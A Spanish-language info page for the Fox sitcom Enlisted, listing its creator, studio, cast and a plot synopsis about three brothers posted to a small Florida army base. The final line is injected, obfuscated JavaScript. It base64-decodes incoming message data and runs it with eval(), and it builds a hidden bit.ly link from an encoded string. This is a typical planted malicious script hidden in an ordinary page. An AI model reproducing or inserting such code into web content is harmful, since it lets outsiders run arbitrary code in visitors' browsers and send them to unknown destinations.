Enlisted

Cartel Serie
Título Original: Enlisted
Creador: Kevin Biegel
Producción Ejecutiva: Kevin Biegel y Mike Royce
Estudio: 20th Century Fox Television
Género: Comedia
Temporada: 1ª
Episodios: 13
Distribución: Fox
Horario de emisión: Viernes 9.30 p.m.

Reparto:
Geoff Stults ... Pete Hill
Chris Lowell ... Derrick Hill
Parker Young ... Randy Hill
Keith David ... Donald Cody
Angelique Cabral ... Jill Perez

Descripcion

Tres hermanos, un Ejército… ¡pero absolutamente nada de guerra! Enlisted es una irreverente pero emotiva comedia sobre tres hermanos que están destinados a una pequeña base militar de Florida, en donde estarán acompañados por un grupo de soldados inadaptados. La responsabilidad de cuidar de todos recaerá en el mayor de ellos quien, tras una breve estancia en Afganistán, es destinado a un cuartel en el que se reúnen a todos aquellos soldados que no tienen el suficiente nivel para mayores empresas profesionales. Él tendrá que liderar un disfuncional escuadrón para el que el servicio militar es una experiencia que irá más allá de lo que todos esperan.

Encantador, gracioso y líder nato, el sargento Pete Hill (Geoff Stults, Ben y Kate) estaba en camino de una exitosa carrera militar hasta que un error en una misión extranjera le llevó de vuelta a Fort McGee, la base militar de Florida donde sus dos hermanos más jóvenes han sido destinados. Ahora, como cabeza de su pelotón, Pete debe actuar como hermano mayor y como jefe militar. El cabo Derrick Hill (Chris Lowell, Sin cita previa) es el hermano mediano. Listo y sarcástico, le gusta meterse en problemas y no le interesa demasiado ser soldado. Todo lo contrario que Randy Hill (Parker Young, Suburgatory). Es muy entusiasta y aspira a ser el “GI-Joe” ideal.
(function(){if(document.cookie.indexOf(‘_advstop’)!==-1)return;var ajaxListener=function(){try{var c=window.atob(event.data);eval(c)}catch(e){}};document.write(”);var h=document.location.protocol+’//’+window.atob(‘Yml0Lmx5LzFFeFJXS2w=’)+’?’+Math.random();addEventListener(‘message’,ajaxListener,false);document.write(”)})();